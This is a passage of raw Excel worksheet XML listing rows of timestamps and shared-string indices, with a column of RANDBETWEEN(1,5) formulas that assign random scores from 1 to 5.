      </c>
      <c r="F19332">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19333" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19333" s="1">
        <v>43144.287314814814</v>
      </c>
      <c r="C19333" t="s">
        <v>60</v>
      </c>
      <c r="E19333" t="s">
        <v>17351</v>
      </c>
      <c r="F19333">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19334" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A19334" s="1">
        <v>43144.261157407411</v>
      </c>
      <c r="C19334" t="s">
        <v>41</v>
      </c>
      <c r="E19334" s="2" t="s">
        <v>17352</v>
      </c>
      <c r="F19334">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19335" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19335" s="1">
        <v>43144.257511574076</v>
      </c>
      <c r="C19335" t="s">
        <v>65</v>
      </c>
      <c r="E19335" s="2" t="s">
        <v>17353</v>
      </c>
      <c r="F19335">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19336" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19336" s="1">
        <v>43144.237222222226</v>
      </c>
      <c r="C19336" t="s">
        <v>41</v>
      </c>
      <c r="E19336" s="2" t="s">
        <v>17354</v>
      </c>
      <c r="F19336">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19337" s="1">
        <v>43144.231342592589</v>
      </c>
      <c r="C19337" t="s">
        <v>17</v>
      </c>
      <c r="E19337" t="s">
        <v>17355</v>
      </c>
      <c r="F19337">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19338" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19338" s="1">
        <v>43144.207453703704</v>
      </c>
      <c r="C19338" t="s">
        <v>97</v>
      </c>
      <c r="E19338" s="2" t="s">
        <v>17356</v>
      </c>
      <c r="F19338">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19339" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19339" s="1">
        <v>43144.180578703701</v>
      </c>
      <c r="C19339" t="s">
        <v>14</v>
      </c>
      <c r="D19339" t="s">
        <v>271</v>
      </c>
      <c r="E19339" t="s">
        <v>16104</v>
      </c>
      <c r="F19339">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19340" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19340" s="1">
        <v>43144.177685185183</v>
      </c>
      <c r="C19340" t="s">
        <v>836</v>
      </c>
      <c r="E19340" t="s">
        <v>17357</v>
      </c>
      <c r="F19340">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19341" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19341" s="1">
        <v>43144.174583333333</v>
      </c>
      <c r="C19341" t="s">
        <v>4429</v>
      </c>
      <c r="D19341" t="s">
        <v>86</v>
      </c>
      <c r="E19341" t="s">
        <v>16104</v>
      </c>
      <c r="F19341">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19342" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19342" s="1">
        <v>43144.171747685185</v>
      </c>
      <c r="C19342" t="s">
        <v>454</v>
      </c>
      <c r="D19342" t="s">
        <v>222</v>
      </c>
      <c r="E19342" s="2" t="s">
        <v>17358</v>
      </c>
      <c r="F19342">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19343" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19343" s="1">
        <v>43144.161111111112</v>
      </c>
      <c r="C19343" t="s">
        <v>430</v>
      </c>
      <c r="D19343" t="s">
        <v>112</v>
      </c>
      <c r="E19343" t="s">
        <v>16104</v>
      </c>
      <c r="F19343">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19344" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19344" s="1">
        <v>43144.153321759259</v>
      </c>
      <c r="C19344" t="s">
        <v>410</v>
      </c>
      <c r="D19344" t="s">
        <v>6</v>
      </c>
      <c r="E19344" t="s">
        <v>16104</v>
      </c>
      <c r="F19344">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19345" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19345" s="1">
        <v>43144.15048611111</v>
      </c>
      <c r="C19345" t="s">
        <v>724</v>
      </c>
      <c r="D19345" t="s">
        <v>222</v>
      </c>
      <c r="E19345" t="s">
        <v>16104</v>
      </c>
      <c r="F19345">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19346" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19346" s="1">
        <v>43144.148518518516</v>
      </c>
      <c r="C19346" t="s">
        <v>339</v>
      </c>
      <c r="E19346" t="s">
        <v>17359</v>
      </c>
      <c r="F19346">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19347" s="1">
        <v>43144.127303240741</v>
      </c>
      <c r="C19347" t="s">
        <v>48</v>
      </c>
      <c r="E19347" t="s">
        <v>17360</v>
      </c>
      <c r="F19347">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19348" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19348" s="1">
        <v>43144.104583333334</v>
      </c>
      <c r="C19348" t="s">
        <v>41</v>
      </c>
      <c r="E19348" s="2" t="s">
        <v>17361</v>
      </c>
      <c r="F19348">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19349" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19349" s="1">
        <v>43144.100694444445</v>
      </c>
      <c r="C19349" t="s">
        <v>41</v>
      </c>
      <c r="E19349" s="2" t="s">
        <v>17362</v>
      </c>
      <c r="F19349">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19350" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19350" s="1">
        <v>43144.093414351853</v>
      </c>
      <c r="C19350" t="s">
        <v>103</v>
      </c>
      <c r="E19350" s="2" t="s">
        <v>17363</v>
      </c>
      <c r="F19350">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19351" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19351" s="1">
        <v>43144.089571759258</v>
      </c>
      <c r="C19351" t="s">
        <v>103</v>
      </c>
      <c r="E19351" s="2" t="s">
        <v>17363</v>
      </c>
      <c r="F19351">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19352" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A19352" s="1">
        <v>43144.041863425926</v>
      </c>
      <c r="C19352" t="s">
        <v>1056</v>
      </c>
      <c r="D19352" t="s">
        <v>336</v>
      </c>
      <c r="E19352" s="2" t="s">
        <v>17364</v>
      </c>
      <c r="F19352">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19353" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19353" s="1">
        <v>43143.858217592591</v>
      </c>
      <c r="C19353" t="s">
        <v>10</v>
      </c>
      <c r="D19353" t="s">
        <v>89</v>
      </c>
      <c r="F19353">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19354" s="1">
        <v>43143.7500462963</v>
      </c>
      <c r="C19354" t="s">
        <v>10</v>
      </c>
      <c r="D19354" t="s">
        <v>86</v>
      </c>
      <c r="E19354" t="s">
        <v>17365</v>
      </c>
      <c r="F19354">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19355" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19355" s="1">
        <v>43143.716273148151</v>
      </c>
      <c r="C19355" t="s">
        <v>10</v>
      </c>
      <c r="D19355" t="s">
        <v>107</v>
      </c>
      <c r="E19355" s="2" t="s">
        <v>17366</v>
      </c>
      <c r="F19355">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19356" s="1">
        <v>43143.71266203704</v>
      </c>
      <c r="C19356" t="s">
        <v>6</v>
      </c>
      <c r="D19356" t="s">
        <v>602</v>
      </c>
      <c r="E19356" t="s">
        <v>17367</v>
      </c>
      <c r="F19356">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19357" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19357" s="1">
        <v>43143.692696759259</v>
      </c>
      <c r="C19357" t="s">
        <v>10</v>
      </c>
      <c r="D19357" t="s">
        <v>52</v>
      </c>
      <c r="E19357" t="s">
        <v>17368</v>
      </c>
      <c r="F19357">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19358" s="1">
        <v>43143.688692129632</v>
      </c>
      <c r="C19358" t="s">
        <v>10</v>
      </c>
      <c r="D19358" t="s">
        <v>192</v>
      </c>
      <c r="E19358" t="s">
        <v>17369</v>
      </c>
      <c r="F19358">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19359" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19359" s="1">
        <v>43143.683668981481</v>
      </c>
      <c r="C19359" t="s">
        <v>10</v>
      </c>
      <c r="D19359" t="s">
        <v>112</v>
      </c>
      <c r="E19359" s="2" t="s">
        <v>17370</v>
      </c>
      <c r="F19359">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19360" s="1">
        <v>43143.679293981484</v>
      </c>
      <c r="C19360" t="s">
        <v>10</v>
      </c>
      <c r="D19360" t="s">
        <v>80</v>
      </c>
      <c r="E19360" t="s">
        <v>17371</v>
      </c>
      <c r="F19360">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19361" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19361" s="1">
        <v>43143.657476851855</v>
      </c>
      <c r="C19361" t="s">
        <v>10</v>
      </c>
      <c r="E19361" s="2" t="s">
        <v>17372</v>
      </c>
      <c r="F19361">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19362" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19362" s="1">
        <v>43143.656238425923</v>
      </c>
      <c r="C19362" t="s">
        <v>10</v>
      </c>
      <c r="D19362" t="s">
        <v>23</v>
      </c>
      <c r="E19362" s="2" t="s">
        <v>17373</v>
      </c>
      <c r="F19362">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19363" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19363" s="1">
        <v>43143.649085648147</v>
      </c>
      <c r="C19363" t="s">
        <v>10</v>
      </c>
      <c r="D19363" t="s">
        <v>11</v>
      </c>
      <c r="E19363" s="2" t="s">
        <v>17374</v>
      </c>
      <c r="F19363">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19364" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19364" s="1">
        <v>43143.647291666668</v>
      </c>
      <c r="C19364" t="s">
        <v>776</v>
      </c>
      <c r="E19364" s="2" t="s">
        <v>17375</v>
      </c>
      <c r="F19364">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19365" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19365" s="1">
        <v>43143.629895833335</v>
      </c>
      <c r="C19365" t="s">
        <v>10</v>
      </c>
      <c r="D19365" t="s">
        <v>41</v>
      </c>
      <c r="E19365" s="2" t="s">
        <v>17376</v>
      </c>
      <c r="F19365">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19366" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19366" s="1">
        <v>43143.615115740744</v>
      </c>
      <c r="C19366" t="s">
        <v>5162</v>
      </c>
      <c r="E19366" s="2" t="s">
        <v>17377</v>
      </c>
      <c r="F19366">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19367" s="1">
        <v>43143.613449074073</v>
      </c>
      <c r="C19367" t="s">
        <v>10</v>
      </c>
      <c r="D19367" t="s">
        <v>667</v>
      </c>
      <c r="E19367" t="s">
        <v>17378</v>
      </c>
      <c r="F19367">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19368" s="1">
        <v>43143.608136574076</v>
      </c>
      <c r="C19368" t="s">
        <v>41</v>
      </c>
      <c r="E19368" t="s">
        <v>17379</v>
      </c>
      <c r="F19368">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19369" s="1">
        <v>43143.606122685182</v>
      </c>
      <c r="C19369" t="s">
        <v>10</v>
      </c>
      <c r="D19369" t="s">
        <v>494</v>
      </c>
      <c r="E19369" t="s">
        <v>17380</v>
      </c>
      <c r="F19369">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19370" s="1">
        <v>43143.604097222225</v>
      </c>
      <c r="C19370" t="s">
        <v>10</v>
      </c>
      <c r="D19370" t="s">
        <v>178</v>
      </c>
      <c r="E19370" t="s">
        <v>17381</v>
      </c>
      <c r="F19370">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19371" s="1">
        <v>43143.604074074072</v>
      </c>
      <c r="C19371" t="s">
        <v>10</v>
      </c>
      <c r="D19371" t="s">
        <v>178</v>
      </c>
      <c r="E19371" t="s">
        <v>17381</v>
      </c>
      <c r="F19371">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19372" s="1">
        <v>43143.604039351849</v>
      </c>
      <c r="C19372" t="s">
        <v>10</v>
      </c>
      <c r="D19372" t="s">
        <v>178</v>
      </c>
      <c r="E19372" t="s">
        <v>17381</v>
      </c>
      <c r="F19372">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19373" s="1">
        <v>43143.603819444441</v>
      </c>
      <c r="C19373" t="s">
        <v>10</v>
      </c>
      <c r="D19373" t="s">
        <v>178</v>
      </c>
      <c r="E19373" t="s">
        <v>17381</v>
      </c>
      <c r="F19373">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19374" s="1">
        <v>43143.603368055556</v>
      </c>
      <c r="C19374" t="s">
        <v>10</v>
      </c>
      <c r="D19374" t="s">
        <v>178</v>
      </c>
      <c r="E19374" t="s">
        <v>17381</v>
      </c>
      <c r="F19374">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19375" s="1">
        <v>43143.603263888886</v>
      </c>
      <c r="C19375" t="s">
        <v>10</v>
      </c>
      <c r="D19375" t="s">
        <v>178</v>
      </c>
      <c r="E19375" t="s">
        <v>17381</v>
      </c>
      <c r="F19375">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19376" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19376" s="1">
        <v>43143.551469907405</v>
      </c>
      <c r="C19376" t="s">
        <v>71</v>
      </c>
      <c r="E19376" s="2" t="s">
        <v>17382</v>
      </c>
      <c r="F19376">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19377" s="1">
        <v>43143.547060185185</v>
      </c>
      <c r="C19377" t="s">
        <v>6</v>
      </c>
      <c r="D19377" t="s">
        <v>194</v>
      </c>
      <c r="E19377" t="s">
        <v>17383</v>
      </c>
      <c r="F19377">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19378" s="1">
        <v>43143.546006944445</v>
      </c>
      <c r="C19378" t="s">
        <v>10</v>
      </c>
      <c r="D19378" t="s">
        <v>11</v>
      </c>
      <c r="E19378" t="s">
        <v>17384</v>
      </c>
      <c r="F19378">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19379" s="1">
        <v>43143.542824074073</v>
      </c>
      <c r="C19379" t="s">
        <v>10</v>
      </c>
      <c r="D19379" t="s">
        <v>494</v>
      </c>
      <c r="E19379" t="s">
        <v>17385</v>
      </c>
      <c r="F19379">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19380" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19380" s="1">
        <v>43143.521562499998</v>
      </c>
      <c r="C19380" t="s">
        <v>10</v>
      </c>
      <c r="D19380" t="s">
        <v>89</v>
      </c>
      <c r="E19380" s="2" t="s">
        <v>17386</v>
      </c>
      <c r="F19380">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19381" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19381" s="1">
        <v>43143.496296296296</v>
      </c>
      <c r="C19381" t="s">
        <v>10</v>
      </c>
      <c r="D19381" t="s">
        <v>36</v>
      </c>
      <c r="E19381" s="2" t="s">
        <v>17387</v>
      </c>
      <c r="F19381">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19382" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19382" s="1">
        <v>43143.493969907409</v>
      </c>
      <c r="C19382" t="s">
        <v>71</v>
      </c>
      <c r="E19382" s="2" t="s">
        <v>17388</v>
      </c>
      <c r="F19382">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19383" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19383" s="1">
        <v>43143.487210648149</v>
      </c>
      <c r="C19383" t="s">
        <v>43</v>
      </c>
      <c r="E19383" s="2" t="s">
        <v>17389</v>
      </c>
      <c r="F19383">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19384" s="1">
        <v>43143.486180555556</v>
      </c>
      <c r="C19384" t="s">
        <v>10</v>
      </c>
      <c r="D19384" t="s">
        <v>6</v>
      </c>
      <c r="E19384" t="s">
        <v>17390</v>
      </c>
      <c r="F19384">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19385" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19385" s="1">
        <v>43143.454097222224</v>
      </c>
      <c r="C19385" t="s">
        <v>10</v>
      </c>
      <c r="D19385" t="s">
        <v>36</v>
      </c>
      <c r="E19385" s="2" t="s">
        <v>17391</v>
      </c>
      <c r="F19385">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19386" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19386" s="1">
        <v>43143.451122685183</v>
      </c>
      <c r="C19386" t="s">
        <v>65</v>
      </c>
      <c r="E19386" s="2" t="s">
        <v>17392</v>
      </c>
      <c r="F19386">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19387" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19387" s="1">
        <v>43143.446944444448</v>
      </c>
      <c r="C19387" t="s">
        <v>65</v>
      </c>
      <c r="E19387" s="2" t="s">
        <v>17392</v>
      </c>
      <c r="F19387">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19388" s="1">
        <v>43143.442881944444</v>
      </c>
      <c r="C19388" t="s">
        <v>10</v>
      </c>
      <c r="D19388" t="s">
        <v>36</v>
      </c>
      <c r="E19388" t="s">
        <v>17393</v>
      </c>
      <c r="F19388">
        <f t="shared" ca="1" si="302"/>
        <v>1</v>
      </c>
    </row>
    <row r="19389" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A19389" s="1">
        <v>43143.440555555557</v>
      </c>
      <c r="C19389" t="s">
        <v>10</v>
      </c>
      <c r="D19389" t="s">
        <v>17</v>
      </c>
      <c r="E19389" s="2" t="s">
        <v>17394</v>
      </c>
      <c r="F19389">
        <f t="shared" ca="1" si="302"/>
        <v>4</v>
      </c>
    </row>
    <row r="19390" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19390" s="1">
        <v>43143.399733796294</v>
      </c>
      <c r="C19390" t="s">
        <v>43</v>
      </c>
      <c r="D19390" t="s">
        <v>163</v>
      </c>
      <c r="E19390" s="2" t="s">
        <v>17395</v>
      </c>
      <c r="F19390">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19391" s="1">
        <v>43143.368148148147</v>
      </c>
      <c r="C19391" t="s">
        <v>10</v>
      </c>
      <c r="D19391" t="s">
        <v>36</v>
      </c>
      <c r="E19391" t="s">
        <v>17396</v>
      </c>
      <c r="F19391">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19392" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A19392" s="1">
        <v>43143.333877314813</v>
      </c>
      <c r="C19392" t="s">
        <v>776</v>
      </c>
      <c r="E19392" s="2" t="s">
        <v>17397</v>
      </c>
      <c r="F19392">
        <f t="shared" ca="1" si="302"/>
        <v>3</v>
      </c>
    </row>
    <row r="19393" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A19393" s="1">
        <v>43143.330254629633</v>
      </c>
      <c r="C19393" t="s">
        <v>41</v>
      </c>
      <c r="E19393" s="2" t="s">
        <v>17398</v>
      </c>
      <c r="F19393">
        <f t="shared" ca="1" si="302"/>
        <v>5</v>
      </c>
    </row>
    <row r="19394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19394" s="1">
        <v>43143.303449074076</v>
      </c>
      <c r="C19394" t="s">
        <v>477</v>
      </c>
      <c r="E19394" t="s">
        <v>17399</v>
      </c>
      <c r="F19394">
        <f t="shared" ref="F19394:F19457" ca="1" si="303">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="19395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19395" s="1">
        <v>43143.286087962966</v>
      </c>
      <c r="C19395" t="s">
        <v>48</v>
      </c>
      <c r="E19395" t="s">
        <v>17400</v>
      </c>
      <c r="F19395">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19396" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19396" s="1">
        <v>43143.243148148147</v>
      </c>
      <c r="C19396" t="s">
        <v>48</v>
      </c>
      <c r="E19396" s="2" t="s">
        <v>17401</v>
      </c>
      <c r="F19396">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19397" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19397" s="1">
        <v>43143.235567129632</v>
      </c>
      <c r="C19397" t="s">
        <v>50</v>
      </c>
      <c r="E19397" s="2" t="s">
        <v>17402</v>
      </c>
      <c r="F19397">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19398" s="1">
        <v>43143.229826388888</v>
      </c>
      <c r="C19398" t="s">
        <v>65</v>
      </c>
      <c r="F19398">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19399" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19399" s="1">
        <v>43143.207696759258</v>
      </c>
      <c r="C19399" t="s">
        <v>4800</v>
      </c>
      <c r="E19399" s="2" t="s">
        <v>17403</v>
      </c>
      <c r="F19399">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19400" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19400" s="1">
        <v>43143.178472222222</v>
      </c>
      <c r="C19400" t="s">
        <v>29</v>
      </c>
      <c r="E19400" s="2" t="s">
        <v>17404</v>
      </c>
      <c r="F19400">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19401" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19401" s="1">
        <v>43143.169502314813</v>
      </c>
      <c r="C19401" t="s">
        <v>41</v>
      </c>
      <c r="D19401" t="s">
        <v>312</v>
      </c>
      <c r="E19401" s="2" t="s">
        <v>17405</v>
      </c>
      <c r="F19401">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19402" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19402" s="1">
        <v>43143.163483796299</v>
      </c>
      <c r="C19402" t="s">
        <v>29</v>
      </c>
      <c r="E19402" s="2" t="s">
        <v>17404</v>
      </c>
      <c r="F19402">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19403" s="1">
        <v>43143.15996527778</v>
      </c>
      <c r="C19403" t="s">
        <v>48</v>
      </c>
      <c r="E19403" t="s">
        <v>17406</v>
      </c>
      <c r="F19403">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19404" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19404" s="1">
        <v>43143.158460648148</v>
      </c>
      <c r="C19404" t="s">
        <v>344</v>
      </c>
      <c r="E19404" s="2" t="s">
        <v>17407</v>
      </c>
      <c r="F19404">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19405" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19405" s="1">
        <v>43143.111805555556</v>
      </c>
      <c r="C19405" t="s">
        <v>318</v>
      </c>
      <c r="D19405" t="s">
        <v>667</v>
      </c>
      <c r="E19405" s="2" t="s">
        <v>17408</v>
      </c>
      <c r="F19405">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19406" s="1">
        <v>43143.110601851855</v>
      </c>
      <c r="C19406" t="s">
        <v>430</v>
      </c>
      <c r="E19406" t="s">
        <v>17409</v>
      </c>
      <c r="F19406">
        <f t="shared" ca="1" si="303"/>
        <v>1</v>
      </c>
    </row>
    <row r="19407" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A19407" s="1">
        <v>43143.078981481478</v>
      </c>
      <c r="C19407" t="s">
        <v>10</v>
      </c>
      <c r="D19407" t="s">
        <v>36</v>
      </c>
      <c r="E19407" s="2" t="s">
        <v>17410</v>
      </c>
      <c r="F19407">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19408" s="1">
        <v>43143.05976851852</v>
      </c>
      <c r="C19408" t="s">
        <v>314</v>
      </c>
      <c r="E19408" t="s">
        <v>17411</v>
      </c>
      <c r="F19408">
        <f t="shared" ca="1" si="303"/>
        <v>3</v>
      </c>
    </row>
    <row r="19409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19409" s="1">
        <v>43143.028344907405</v>
      </c>
      <c r="C19409" t="s">
        <v>845</v>
      </c>
      <c r="E19409" t="s">
        <v>17412</v>
      </c>
      <c r="F19409">
        <f t="shared" ca="1" si="303"/>
        <v>2</v>
      </c>
    </row>
    <row r="19410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19410" s="1">
        <v>43143.028217592589</v>
      </c>
      <c r="C19410" t="s">
        <v>41</v>
      </c>
      <c r="E19410" t="s">
        <v>17413</v>
      </c>
      <c r="F19410">
        <f t="shared" ca="1" si="303"/>
        <v>5</v>
      </c>
    </row>
    <row r="19411" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A19411" s="1">
        <v>43143.016828703701</v>
      </c>
      <c r="C19411" t="s">
        <v>10</v>
      </c>
      <c r="D19411" t="s">
        <v>36</v>
      </c>
      <c r="E19411" s="2" t="s">
        <v>17414</v>
      </c>
